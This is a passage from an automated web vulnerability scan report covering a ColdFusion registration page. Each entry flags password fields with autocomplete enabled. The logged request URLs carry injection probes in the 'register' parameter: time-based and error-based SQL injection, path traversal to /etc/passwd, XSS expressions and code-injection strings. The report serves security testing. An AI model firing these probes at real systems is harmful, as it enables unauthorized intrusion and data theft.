Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='+OR+'ns'%3d'ns" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.144. https://hourly.deploy.com/hmc/report/ previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.145. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+ HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=-111%27%20OR%20SLEEP(25)=0%20LIMIT%201--+" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.146. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:48 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: JSESSIONID=3e302e62600f5f7a4b68;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%26expr%20268409241%20-%202%20%26" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.147. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)))

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=(SELECT%20CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97)))" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.148. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/fd/2" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.149. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=print(int)0xFFF9999-22;//

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=print(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:41 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:41 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=print(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.150. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x000044))%3E

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x000044))%3E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:50 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:50 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%3C/a%20style=x:expre/**/ssion(netsparker(0x000044))%3E" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.151. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D' HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:47 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:47 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register='+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)+or+'1'%3D'" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.152. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;//

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;// HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:42 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:42 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%2Bprint(int)0xFFF9999-22;//" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.153. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:42:04 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:42:04 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=data%3A%3Bbase64%2CTlM3NzU0NTYxNDQ2NTc1" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.154. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27--

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27-- HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:35 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:35 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=%27;WAITFOR%20DELAY%20%270:0:25%27--" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.155. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=;ns:expression(netsparker(0x000049));

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=;ns:expression(netsparker(0x000049)); HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=;ns:expression(netsparker(0x000049));" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.156. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=javascript:netsparker(0x000037)

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=javascript:netsparker(0x000037) HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=javascript:netsparker(0x000037)" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.157. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=1

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=1 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

17.158. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00 HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:51 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:51 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../../etc/passwd%00" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.159. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version

The form contains the following password fields with autocomplete enabled:

j_password
j_passwordconfirm

Request

GET /hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/?register=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e306b860232c5826104
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:49 GMT
Server: Apache/2.0.46 (Red Hat)
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
Expires: Mon, 25 Apr 2011 13:41:49 GMT
Connection: close
Content-Type: text/html; charset=UTF-8


...[SNIP]...
</SCRIPT>


       <form name="form1" action="/hmc/report/index.cfm?register=../../../../../../../../../../proc/self/version" method="post" onSubmit="document.form1.register.disabled='disabled';">


           <TABLE class="drawBox" align="center" BORDER=0 CELLPADDING=0 CELLSPACING=0 WIDTH="650">
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_password" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...
<TD class="smallGray"><input class="reportfilter" name="j_passwordconfirm" type="password" size="25" maxlength="25">
                                           <BR>
...[SNIP]...

17.160. https://hourly.deploy.com/hmc/report/index.cfm previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	https://hourly.deploy.com
Path:	/hmc/report/index.cfm

Issue detail

The page contains a form with the following action URL:

https://hourly.deploy.com/hmc/report/index.cfm?nsextt=%2527%2522--%253e%253c%252fstyle%253e%253c%252fscript%253e%253cscript%253enetsparker%25280x000009%2529%253c%252fscript%253e

The form contains the following password field with autocomplete enabled:

j_password

Request

GET /hmc/report/index.cfm?nsextt=%2527%2522--%253E%253C%252Fstyle%253E%253C%252Fscript%253E%253Cscript%253Enetsparker%25280x000009%2529%253C%252Fscript%253E HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Accept-Encoding: gzip, deflate
Connection: Keep-Alive

Response

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:39 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-US
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=0
